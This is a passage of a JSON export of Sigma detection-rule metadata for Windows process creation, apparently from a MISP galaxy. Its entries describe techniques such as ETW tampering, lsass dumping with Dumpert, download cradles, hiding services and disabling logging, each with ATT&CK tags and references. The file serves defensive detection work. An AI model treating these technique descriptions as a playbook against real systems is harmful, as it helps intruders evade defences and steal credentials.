"https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", "http://managed670.rssing.com/chan-5590147/all_p1.html", "https://bunnyinside.com/?term=f71e8cb9c76a", "https://twitter.com/_xpn_/status/1268712093928378368", "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_etw_modification_cmdline.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562" ] }, "related": [ { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "41421f44-58f9-455d-838a-c398859841d4", "value": "ETW Logging Tamper In .NET Processes Via CommandLine" }, { "description": "Detects suspicious child processes of the Veeam service process. 
This could indicate potential RCE or SQL Injection.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-04", "falsepositive": "No established falsepositives", "filename": "proc_creation_win_mssql_veaam_susp_child_processes.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://labs.withsecure.com/publications/fin7-target-veeam-servers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mssql_veaam_susp_child_processes.yml" ], "tags": [ "attack.initial-access", "attack.persistence", "attack.privilege-escalation" ] }, "uuid": "d55b793d-f847-4eea-b59a-5ab09908ac90", "value": "Suspicious Child Process Of Veeam Dabatase" }, { "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", "meta": { "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", "creation_date": "2019-02-22", "falsepositive": [ "False positives depend on scripts and administrative tools used in the monitored environment" ], "filename": "proc_creation_win_mshta_susp_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356", "https://twitter.com/mattifestation/status/1326228491302563846", "https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997", "http://blog.sevagas.com/?Hacking-around-HTA-files", "https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/xml/xslt/xslt-stylesheet-scripting-using-msxsl-script", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_susp_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1140", "attack.t1218.005", "attack.execution", "attack.t1059.007", "cve.2020-1599" ] }, "related": 
[ { "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", "value": "MSHTA Suspicious Execution 01" }, { "description": "Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs.\nThis technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)", "creation_date": "2022-09-09", "falsepositive": [ "Legitimate usage of the utility by administrators to query the event log" ], "filename": "proc_creation_win_susp_eventlog_content_recon.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/get-winevent?view=powershell-7.3", "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a", "https://labs.withsecure.com/content/dam/labs/docs/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf", "http://www.solomonson.com/posts/2010-07-09-reading-eventviewer-command-line/", "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-eventlog?view=powershell-5.1", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", 
"https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/", "https://www.group-ib.com/blog/apt41-world-tour-2021/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_eventlog_content_recon.yml" ], "tags": [ "attack.credential-access", "attack.discovery", "attack.t1552" ] }, "related": [ { "dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "beaa66d6-aa1b-4e3c-80f5-e0145369bfaf", "value": "Potentially Suspicious EventLog Recon Activity Using Log Query Utilities" }, { "description": "Detects suspicious powershell execution via a scheduled task where the command ends with suspicious flags to hide the powershell instance instead of executing scripts or commands. This could be a sign of persistence via the PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", "meta": { "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", "creation_date": "2022-04-08", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_schtasks_powershell_persistence.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_powershell_persistence.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.t1053.005", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], 
"uuid": "b66474aa-bd92-4333-a16c-298155b120df", "value": "Potential Persistence Via Powershell Search Order Hijacking - Task" }, { "description": "Detects the addition of a new rule to the Windows firewall via netsh", "meta": { "author": "Markus Neis, Sander Wiebing", "creation_date": "2019-01-29", "falsepositive": [ "Legitimate administration activity", "Software installations" ], "filename": "proc_creation_win_netsh_fw_add_rule.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20190508165435/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_add_rule.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004", "attack.s0246" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c", "value": "New Firewall Rule Added Via Netsh.EXE" }, { "description": "Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)", "meta": { "author": "Jason Lynch", "creation_date": "2019-04-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/23160972c6ae07f740800fa28e421a81d7c0ca5d5cab95bc082b4a986fbac57", "https://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml" ], "tags": [ "attack.execution", "attack.t1204.002", "attack.g0046", 
"car.2013-05-002" ] }, "related": [ { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", "value": "Suspicious Binary In User Directory Spawned From Office Application" }, { "description": "Detects a suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_nslookup_poweshell_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/Alh4zr3d/status/1566489367232651264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "1b3b01c7-84e9-4072-86e5-fc285a41ff23", "value": "Nslookup PowerShell Download Cradle - ProcessCreation" }, { "description": "Detects execution of \"git\" in order to clone a remote repository that contains keywords which might be suspicious", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-03", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_git_susp_clone.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_git_susp_clone.yml" ], "tags": [ "attack.reconnaissance", "attack.t1593.003" ] }, "related": [ { "dest-uuid": "70910fbd-58dc-4c1c-8c48-814d11fcd022", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aef9d1f1-7396-4e92-a927-4567c7a495c1", "value": "Suspicious Git Clone" }, { "description": "Detects usage of the \"sc.exe\" utility adding a new service with special permissions, as seen used by threat actors, which make the service hidden and unremovable.", "meta": { "author": "Andreas Hunkeler (@Karneades)", "creation_date": "2021-12-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sc_sdset_hide_sevices.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_hide_sevices.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.011" ] }, "related": [ { "dest-uuid": "17cc750b-e95b-4d7d-9dde-49e0de24148c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a537cfc3-4297-4789-92b5-345bfd845ad0", "value": "Service DACL Abuse To Hide Services Via Sc.EXE" }, { "description": "Detects modification or addition to the 'TypedPaths' key in the user or admin registry via the commandline. 
Which might indicate persistence attempt", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_registry_typed_paths_persistence.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://forensafe.com/blogs/typedpaths.html", "https://twitter.com/dez_/status/1560101453150257154", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_typed_paths_persistence.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba", "value": "Persistence Via TypedPaths - CommandLine" }, { "description": "Detects the usage of the \"Squirrel.exe\" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community", "creation_date": "2022-06-09", "falsepositive": [ "Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.)" ], "filename": "proc_creation_win_squirrel_proxy_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/", "http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/", "http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_squirrel_proxy_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "45239e6a-b035-4aaf-b339-8ad379fcb67e", "value": "Process Proxy Execution Via Squirrel.EXE" }, { "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://isc.sans.edu/diary/22264", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1197", "attack.s0190", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2ddef153-167b-4e89-86b6-757a9e65dcac", "value": "File Download Via Bitsadmin To A Suspicious Target Folder" }, { "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. 
Often used by attackers to remove AV software services", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-01", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_reg_delete_services.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_delete_services.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", "value": "Service Registry Key Deleted Via Reg.EXE" }, { "description": "Detects a suspicious child process of userinit", "meta": { "author": "Florian Roth (Nextron Systems), Samir Bousseaden (idea)", "creation_date": "2019-06-17", "falsepositive": [ "Administrative scripts" ], "filename": "proc_creation_win_susp_userinit_child.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/SBousseaden/status/1139811587760562176", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml" ], "tags": [ "attack.defense-evasion", "attack.t1055" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b655a06a-31c0-477a-95c2-3726b83d649d", "value": "Suspicious Userinit Child Process" }, { "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. 
spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n", "meta": { "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "creation_date": "2020-10-23", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_susp_bad_opsec_sacrificial_processes.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool", "https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/", "https://learn.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32", "https://twitter.com/CyberRaiju/status/1251492025678983169", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32", "https://www.cobaltstrike.com/help-opsec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a7c3d773-caef-227e-a7e7-c2f13c622329", "value": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments" }, { "description": "Detects the execution of the GMER tool based on image and hash fields.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": 
"2022-10-05", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_gmer.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "http://www.gmer.net/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_gmer.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", "value": "HackTool - GMER Rootkit Detector and Remover Execution" }, { "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-02-11", "falsepositive": [ "Legitimate tools that accidentally match on the searched patterns" ], "filename": "proc_creation_win_susp_progname.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_progname.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", "value": "Suspicious Program Names" }, { "description": "ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. 
High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context.", "meta": { "author": "frack113", "creation_date": "2022-12-09", "falsepositive": [ "Very Likely, including launching cmd.exe via Run As Administrator" ], "filename": "proc_creation_win_conhost_legacy_option.yml", "level": "informational", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control", "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", "https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conhost_legacy_option.yml" ], "tags": [ "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3037d961-21e9-4732-b27a-637bcc7bf539", "value": "Suspicious High IntegrityLevel Conhost Legacy Option" }, { "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", "meta": { "author": "frack113", "creation_date": "2022-01-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_iis_appcmd_http_logging.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.002/T1562.002.md#atomic-test-1---disable-windows-iis-http-logging", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_appcmd_http_logging.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.002" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", "value": "Disable Windows IIS HTTP Logging" }, { "description": "Detects uncommon or suspicious child processes of \"eventvwr.exe\" which might indicate a UAC bypass attempt", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-03-19", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_eventvwr_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100", "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_eventvwr_susp_child_process.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002", "car.2019-04-001" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "be344333-921d-4c4d-8bb8-e584cf584780", "value": "Potentially Suspicious Event Viewer Child Process" }, { "description": "Detect indirect command execution via Program Compatibility Assistant pcwrun.exe", "meta": { "author": "A. 
Sungurov , oscd.community", "creation_date": "2020-10-12", "falsepositive": [ "Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts", "Legit usage of scripts" ], "filename": "proc_creation_win_lolbin_pcwrun.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/pabraeken/status/991335019833708544", "https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218", "attack.execution" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b97cd4b1-30b8-4a9d-bd72-6293928d52bc", "value": "Indirect Command Execution By Program Compatibility Wizard" }, { "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", "meta": { "author": "Jonathan Cheong, oscd.community", "creation_date": "2020-10-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_invoke_obfuscation_clip.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_clip.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b222df08-0e07-11eb-adc1-0242ac120002", 
"value": "Invoke-Obfuscation CLIP+ Launcher" }, { "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) execution location.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-10-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wermgr_susp_exec_location.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html", "https://github.com/binderlabs/DirCreate2System", "https://www.echotrail.io/insights/search/wermgr.exe", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wermgr_susp_exec_location.yml" ], "tags": [ "attack.execution" ] }, "uuid": "5394fcc7-aeb2-43b5-9a09-cac9fc5edcd5", "value": "Suspicious Execution Location Of Wermgr.EXE" }, { "description": "Detects potentially suspicious file download from file sharing domains using curl.exe", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_curl_download_susp_file_sharing_domains.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv", "https://labs.withsecure.com/publications/fin7-target-veeam-servers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml" ], "tags": [ "attack.execution" ] }, "uuid": "56454143-524f-49fb-b1c6-3fb8b1ad41fb", "value": "Suspicious File Download From File Sharing Domain Via Curl.EXE" }, { "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": 
"2020-02-04", "falsepositive": [ "Very unlikely" ], "filename": "proc_creation_win_hktl_dumpert.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/", "https://github.com/outflanknl/Dumpert", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_dumpert.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2704ab9e-afe2-4854-a3b1-0c0706d03578", "value": "HackTool - Dumpert Process Dumper Execution" }, { "description": "Detects command line parameters used by Hydra password guessing hack tool", "meta": { "author": "Vasiliy Burov", "creation_date": "2020-10-05", "falsepositive": [ "Software that uses the caret encased keywords PASS and USER in its command line" ], "filename": "proc_creation_win_hktl_hydra.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/vanhauser-thc/thc-hydra", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_hydra.yml" ], "tags": [ "attack.credential-access", "attack.t1110", "attack.t1110.001" ] }, "related": [ { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aaafa146-074c-11eb-adc1-0242ac120002", "value": "HackTool - Hydra Password Bruteforce Execution" }, { "description": "Detects wscript/cscript executions of scripts located in user directories", "meta": { "author": 
"Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2019-01-16", "falsepositive": [ "Some installers might generate a similar behavior. An initial baseline is required" ], "filename": "proc_creation_win_wscript_cscript_dropper.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/gootloader/", "https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wscript_cscript_dropper.yml" ], "tags": [ "attack.execution", "attack.t1059.005", "attack.t1059.007" ] }, "related": [ { "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cea72823-df4d-4567-950c-0b579eaf0846", "value": "Potential Dropper Script Execution Via WScript/CScript" }, { "description": "Executes SCT 